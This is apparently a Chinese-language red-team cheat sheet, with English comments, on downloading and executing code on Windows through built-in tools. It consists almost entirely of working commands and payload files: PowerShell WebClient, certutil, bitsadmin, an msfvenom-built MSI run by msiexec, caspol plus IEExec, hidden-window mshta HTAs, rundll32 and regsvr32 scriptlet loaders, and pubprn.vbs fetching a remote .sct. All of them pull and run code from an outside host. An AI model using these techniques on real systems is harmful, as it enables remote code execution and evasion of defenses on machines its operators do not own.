windows下载执行文件总结

Powershell

PowerShell 脚本（.ps1 文件）默认受执行策略（Execution Policy）限制而无法直接运行，可以通过更改执行策略，或在启动时用 `-ExecutionPolicy Bypass` 参数绕过。注意执行策略只是防止误运行脚本的保护措施，并不是安全边界，而且它不限制在命令行中直接输入的命令。

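# Show the effective execution policy for this session.
Get-ExecutionPolicy
# Lift the restriction. The default scope is LocalMachine: this needs an elevated shell,
# writes the setting to the registry and persists for every user until changed back.
# For a one-off session prefer a non-persistent form instead, e.g.
#   Set-ExecutionPolicy Unrestricted -Scope Process
# or start the interpreter as: powershell -ExecutionPolicy Bypass -File script.ps1
# (The original listing had the Chinese description glued onto the command line,
#  which made both lines fail to parse; it is now a comment.)
Set-ExecutionPolicy UnRestricted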
# Download a file with System.Net.WebClient: 'url' is the remote file, 'path' the local
# destination. DownloadFile is synchronous and always writes the body to disk.
$wc = New-Object -TypeName System.Net.WebClient
$wc.DownloadFile('url','path')
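rem Same download as a one-liner launched from cmd. A space separates the program name
rem from the expression so cmd does not treat "(" as part of the executable name.
rem No execution-policy change is needed here: the policy only governs script files,
rem not commands passed on the command line.
powershell (new-object System.Net.WebClient).DownloadFile('url','path')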

IPC$

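rem Copy a file over SMB. This needs an SMB session to the host (an IPC$ connection,
rem i.e. net use \\<host>\ipc$ with valid credentials, or credentials the target
rem already accepts). The original line was missing the host's last octet and the
rem share name; the UNC form is \\<host>\<share>\<file>.
copy \\<host>\<share>\<file> <path>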

certutil

rem Download url to filename. -urlcache fetches through certutil's URL cache, -split
rem writes the body out as a file, -f overwrites an existing file. A cached copy is
rem typically left behind (certutil -urlcache * delete clears it), and certutil making
rem HTTP downloads is a well-known detection signature.
certutil -urlcache -split -f url filename

bitsadmin

rem Download url to path as a BITS job named "n" (the name is arbitrary). path has to be
rem an absolute local path. The job is visible with bitsadmin /list /allusers while it
rem runs and BITS transfers are typically recorded in the BITS-Client event log.
bitsadmin /transfer n url path

msiexec

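# Attacker side: build the MSI first. The windows/exec payload runs CMD when the
# package is installed.
msfvenom -f msi -p windows/exec CMD=calc.exe > test.msi
# Target side (Windows cmd): /i installs from a URL, /q suppresses all UI. msiexec
# fetches the file itself, so no separate download step is needed; the "install"
# still leaves a Windows Installer event behind even though it only runs the payload.
msiexec /q /i http://192.168.1.1/test.msi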

IEExec

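rem IEExec.exe ships with the .NET Framework; look for it under the framework install
rem directory (typically %windir%\Microsoft.NET\Framework\<version>\).
rem caspol -s off disables .NET code-access security policy for the whole machine and
rem persists until it is turned back on with caspol -s on - a configuration change that
rem outlives the test. (The original had the description glued onto the command line.)
caspol -s off
rem IEExec then downloads the .NET executable from the URL and runs it.
IEExec http://192.168.1.1/test.exe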

mshta

rem mshta.exe accepts a URL: it fetches run.hta (below) over HTTP and executes it as an
rem HTML Application, so the embedded script runs as the current user and is not subject
rem to Internet Explorer's zone restrictions.
mshta http://192.168.1.1/run.hta

run.hta

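<HTML> 
<!-- HTA served to mshta: shrinks and moves its own window off-screen, runs one command
     through WScript.Shell, then closes itself. -->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
' Put the command to run here. VBScript comments start with an apostrophe; the "//"
' used in the original listing is a syntax error and stopped the whole script from running.
objShell.Run "cmd.exe /c net user"
self.close
</script>
</HEAD>
<body>
test
</body>
</HTML>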

mshta执行vbscript

rem Inline VBScript through the vbscript: protocol handler: Run("calc.exe",0,true) starts
rem calc with a hidden window (style 0) and waits for it to exit; the trailing
rem (window.close) then closes the HTA window so mshta.exe terminates.
mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)

mshta执行javascript

rem Runs calc.exe hidden (window style 0) from a javascript: URL; %20 is decoded because
rem mshta treats the argument as a URL. The h.Send()/ResponseText/eval() part looks like a
rem leftover from an XMLHTTP-based stager: here h is the integer returned by Run(), so
rem h.Send() always throws and the catch branch force-kills every mshta.exe process
rem (taskkill /im matches all instances, not just this one) - that is what ends the window.
mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

rundll32

rem rundll32 loads mshtml.dll and calls RunHTMLApplication on the javascript: URL. The
rem script then uses the script: moniker, so GetObject() fetches calc.wsc (below) over HTTP
rem and instantiates it, which runs the JScript inside the component.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.1.1/calc.wsc")

calc.wsc

<?xml version="1.0"?>
<!-- Windows Script Component fetched remotely via GetObject("script:http://.../calc.wsc").
     The JScript in the component body runs as soon as the component is instantiated. -->
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
// Run the payload. With no window-style/wait arguments Run() shows a normal window
// and returns immediately; the return value is not used.
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</component>
</package>

rundll32执行hta

rem OpenURL in url.dll hands the file to its registered handler; for a .hta that is
rem mshta.exe, so calc.hta (below) runs. A bare file name is resolved from the current
rem directory.
rundll32.exe url.dll,OpenURL "calc.hta"

calc.hta

<html><head><script>
// HTA opened through rundll32 url.dll,OpenURL: spawns cmd /c calc.exe with a hidden
// window (second Run() argument 0; %windir% is expanded by Run) and closes itself at once.
a=new ActiveXObject("WScript.shell");
a.run('%windir%\\System32\\cmd.exe /c calc.exe',0);
window.close();
</script></head></html>

rundll32执行url

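rem All three DLLs export OpenURL; each opens the given Internet-shortcut (.url) file
rem through the shell, which launches whatever the URL inside it points at.
rundll32.exe ieframe.dll, OpenURL <local .url file path>
rundll32.exe url.dll, OpenURL <local .url file path>
rundll32.exe shdocvw.dll, OpenURL <local .url file path>
rem Content of the .url file. Internet shortcuts are INI-formatted: the [InternetShortcut]
rem section header (missing from the original listing) is part of the format and the
rem URL= key is read from that section.
[InternetShortcut]
URL=file:///c:\windows\system32\calc.exe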

regsvr32

rem /i:<url> passes the URL to scrobj.dll's DllInstall, which fetches the scriptlet and
rem runs the JScript in its <registration> block; the .png extension does not matter.
rem /s hides dialogs and /u takes the uninstall path, so no COM registration is expected
rem to be left behind. This is the technique Casey Smith published as "Squiblydoo"; the
rem fetch is a plain HTTP request made by regsvr32.exe itself.
regsvr32 /u /s /i:http://192.168.1.1/test.png scrobj.dll

test.png

<?XML version="1.0"?>
<!-- Scriptlet fetched by regsvr32 /i:<url> scrobj.dll. The JScript inside <registration>
     runs while scrobj processes the file; progid and classid are arbitrary values. -->
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
// Command to run: window style 0 hides it, true blocks until cmd.exe exits.
ps = "cmd.exe /c calc.exe";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]]>
</script>
</registration>
</scriptlet>

pubprn.vbs

rem Signed Microsoft script abused as a loader (published by enigma0x3): pubprn.vbs hands
rem its second argument to GetObject(), so a script: moniker URL makes it fetch and run the
rem remote .sct; the first argument (127.0.0.1) only fills the "server" parameter the script
rem expects. /b is batch mode, which suppresses script errors and prompts. The path is
rem locale-specific - zh-CN here; on an English system the script lives under ...\en-US\.
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct

未完待续